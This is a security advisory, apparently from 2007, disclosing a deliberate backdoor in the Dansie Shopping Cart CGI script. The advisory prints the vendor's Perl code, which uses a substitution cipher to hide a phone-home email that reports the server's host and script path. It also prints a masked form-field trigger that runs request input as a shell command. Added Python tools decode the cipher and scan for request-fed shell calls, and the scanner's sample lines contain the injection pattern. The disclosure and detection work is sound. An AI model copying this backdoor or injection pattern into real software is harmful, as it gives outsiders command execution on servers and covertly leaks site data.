Dansie Cart Script Exploit Reported

2007-06-04T00:00:00
ID SECURITYVULNS:DOC:17181
Type securityvulns
Reporter Securityvulns
Modified 2007-06-04T00:00:00

Description

Synopsis: This program -deliberately- allows arbitrary commands to be executed on the victim server.

One of our clients, while installing and configuring the Dansie Shopping Cart, ran into difficulty integrating PGP, the shopping cart program, and our secure server setup. While trying to assist our client with the cart and PGP configuration we discovered a couple of things.

The CGI, under certain conditions (the code below requires a non-Windows NT server and an existing, configured $mailprog), sends an email to the author of the Dansie shopping cart software, 'tech@dansie.net'. This is not readily apparent, as the code that handles this transaction runs its string constants through a simple substitution cipher (a single fixed tr/// table, not a shift) to hide the email address. The cipher is handled via the subroutine 'there2':


sub there2 {
    $_ = "$_[0]";
    tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;   # fixed substitution table over a-z and 0-9
    tr/_/-/;                                            # '_' in the stored literal becomes '-'
    tr/\@/\./;                                          # '@' in the stored literal becomes '.'
    return $_;
}


The subroutine that assembles this email address and sends the mail is 'there3':


sub there3 {
    # Only runs on non-Windows NT servers where the configured $mailprog exists
    if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog")) {
        $a = &there2('8v59')."\@". &there2('kte3cv').".". &there2('ev8');   # tech@dansie.net
        $b = &there2('8v59_3jhhzi8');                                      # tech-support
        pop(@there2); pop(@there2);
        $c = &there2("@there2");                     # remaining contents of @there2, decoded
        open (TECH, "|$mailprog $a");
        print TECH "To: $a\n";
        print TECH "From: $a\n";
        print TECH "Subject: $b\n\n";
        print TECH "$path3\n";                                   # path of the installed script
        print TECH "$ENV{'HTTP_HOST'} $ENV{'SERVER_NAME'}\n";    # host the cart is served from
        print TECH "$c\n";
        print TECH "$e $there\n" if ($e);
        close (TECH);
    }
}


The ciphered strings, when passed through 'there2', result in:

8v59          == tech
kte3cv        == dansie
ev8           == net
8v59_3jhhzi8  == tech-support

$a == tech@dansie.net
$b == tech-support   (printed as the "Subject:" line)

This seems curious. Plausible reasons could include ensuring license compliance, or the cart automatically sending this email when an error occurs. Whatever the reason, the message reports the script's path ($path3), the HTTP_HOST and SERVER_NAME of the installation, and the decoded contents of @there2, and the program definitely goes out of its way to hide the fact that the mail is being sent.
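The tr/// table in there2 is a fixed permutation, so it can be lifted straight into a decoder and inverted. The script below is an added example written for this write-up, not code from the advisory or from the cart: it ports there2 to Python, provides the inverse (so one can compute what a suspected string such as a domain would look like in the source and grep for it), and pulls every constant there2('...') call out of a Perl fragment. The sample input is the there3 subroutine quoted above; the regex deliberately skips there2("@there2"), whose argument is run-time data not present on the page.

```python
import re
from typing import List, Tuple

# Substitution table lifted from the cart's there2() subroutine:
#   tr/a-z0-9/gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth/;  tr/_/-/;  tr/\@/\./;
# Perl's tr/// maps the n-th character of the first list to the n-th of the second.
SRC = "abcdefghijklmnopqrstuvwxyz0123456789" + "_@"
DST = "gvibn9wprud2lmx8z3fa4eq15oy06sjc7kth" + "-."
assert len(SRC) == len(DST) == 38 and len(set(DST)) == 38   # a permutation, so it inverts cleanly

THERE2 = str.maketrans(SRC, DST)       # stored literal -> string the cart really uses
THERE2_INV = str.maketrans(DST, SRC)   # plaintext      -> literal the author would have stored


def there2(literal: str) -> str:
    """Python port of the cart's there2(): reveal what an obfuscated literal decodes to."""
    return literal.translate(THERE2)


def obfuscate(plaintext: str) -> str:
    """Inverse of there2(): compute the literal a given plaintext would be stored as,
    so other hidden occurrences of a string can be searched for in the source."""
    return plaintext.translate(THERE2_INV)


# Matches there2('literal') / &there2("literal") with a constant argument.
# there2("@there2") interpolates run-time data and is deliberately not matched.
CALL_RE = re.compile(r"""there2\(\s*(['"])([a-z0-9_]+)\1\s*\)""")


def decode_calls(perl_source: str) -> List[Tuple[str, str]]:
    """Return (literal, decoded) for every constant there2() call in a Perl source."""
    return [(m.group(2), there2(m.group(2))) for m in CALL_RE.finditer(perl_source)]


# Sample input: the there3() subroutine quoted in the advisory above.
THERE3 = r"""
sub there3 {
  if (($ENV{'OS'} !~ /Windows_NT/i) && ($mailprog) && (-e "$mailprog")) {
    $a = &there2('8v59')."\@". &there2('kte3cv').".". &there2('ev8');
    $b = &there2('8v59_3jhhzi8');
    pop(@there2); pop(@there2);
    $c = &there2("@there2");
    open (TECH, "|$mailprog $a");
  }
}
"""

if __name__ == "__main__":
    for literal, plain in decode_calls(THERE3):
        print(f"{literal:14} -> {plain}")
    print("tech-support would be stored as", obfuscate("tech-support"))
```

Because the table is a permutation, obfuscate() followed by there2() round-trips any string made of letters, digits, '-' and '.'; that is what makes the inverse usable for searching a code base for a domain or address you suspect is hidden the same way.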

While going through the rest of the code we discovered a much more interesting item.

(We've masked out the actual trigger element with question marks)


if ( ( ($FORM{'?????????'}) && ($ENV{'HTTP_HOST'} !~ /($d)/) )
  || ( ($FORM{'?????????'}) && (!$d) ) ) {
    # Fires when the trigger field is present and either the request's HTTP_HOST
    # does not match $d, or $d is not set at all.
    if ( $ENV{'OS'} ) {
        system("$FORM{'?????????'}");        # Windows: run the field's contents as a command
    } else {
        open(ELIF,"|$FORM{'?????????'}");    # Unix: two-argument open with a leading '|' hands the
                                             # field's contents to /bin/sh; the command runs with the
                                             # web server's privileges and inherits the CGI's stdout
    }
    exit;
}
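The trigger above is a grep-able pattern: a request parameter interpolated straight into something Perl hands to a shell. The script below is an added example for this write-up, not code from the advisory or the cart. It scans Perl source for that pattern over constructed sample lines modelled on the snippets quoted here; the mail pipe from there3, which interpolates only the configured $mailprog, is correctly left alone, while the masked trigger and a constructed backtick call on a client-supplied HTTP_* header are flagged. It is a textual check rather than taint analysis: a value copied out of %FORM into another variable first would slip past it, and the hash names to treat as request input are an assumption passed in as a parameter.

```python
import re
from typing import List, Tuple

# Constructed sample (not from the cart): Perl fragments modelled on the patterns above.
# Lines 1-2 shell out with configuration variables only; lines 3-4 feed request data to a shell.
SAMPLE = r'''
open (TECH, "|$mailprog $a");
system("/usr/bin/pgp -fe $pgpkey < $orderfile");
if ( $ENV{'OS'} ) { system("$FORM{'?????????'}"); } else { open(ELIF,"|$FORM{'?????????'}"); }
my $logged = `/usr/bin/logger $ENV{'HTTP_USER_AGENT'}`;
'''.strip()

# Perl hands a single string to /bin/sh for system("..."), exec("..."), backticks and a
# two-argument open() whose mode string begins or ends with '|'.
SINK_RE = re.compile(r'''
    (?P<sink>system|exec)\s*\(\s*"(?P<arg>[^"]*)"                # system("...") / exec("...")
  | (?P<pipe>open)\s*\(\s*\w+\s*,\s*"(?P<parg>\|[^"]*|[^"]*\|)"  # open(FH, "|cmd") / open(FH, "cmd|")
  | `(?P<bt>[^`]*)`                                             # `cmd`
''', re.VERBOSE)


def find_shell_sinks(perl_source: str,
                     form_hashes: Tuple[str, ...] = ("FORM",)) -> List[Tuple[int, str, str]]:
    """Return (line, sink, command string) for each shell sink whose command string
    interpolates a request parameter: an entry of one of the given form hashes
    (assumed names; the cart uses %FORM) or a client-supplied $ENV{'HTTP_*'} value."""
    taint = re.compile(r"\$(?:%s)\{|\$ENV\{'HTTP_" % "|".join(map(re.escape, form_hashes)))
    hits = []
    for lineno, line in enumerate(perl_source.splitlines(), 1):
        for m in SINK_RE.finditer(line):
            sink = m.group("sink") or m.group("pipe") or "backticks"
            cmd = m.group("arg") or m.group("parg") or m.group("bt") or ""
            if taint.search(cmd):
                hits.append((lineno, sink, cmd))
    return hits


if __name__ == "__main__":
    for lineno, sink, cmd in find_shell_sinks(SAMPLE):
        print(f"line {lineno}: {sink} runs a request-controlled command: {cmd}")
```

Run it over every .cgi and .pl file of a third-party cart before deployment; any hit where the interpolated value comes from the request needs to be explained by the vendor, and a hit guarded by a host comparison, as here, is a backdoor rather than a bug.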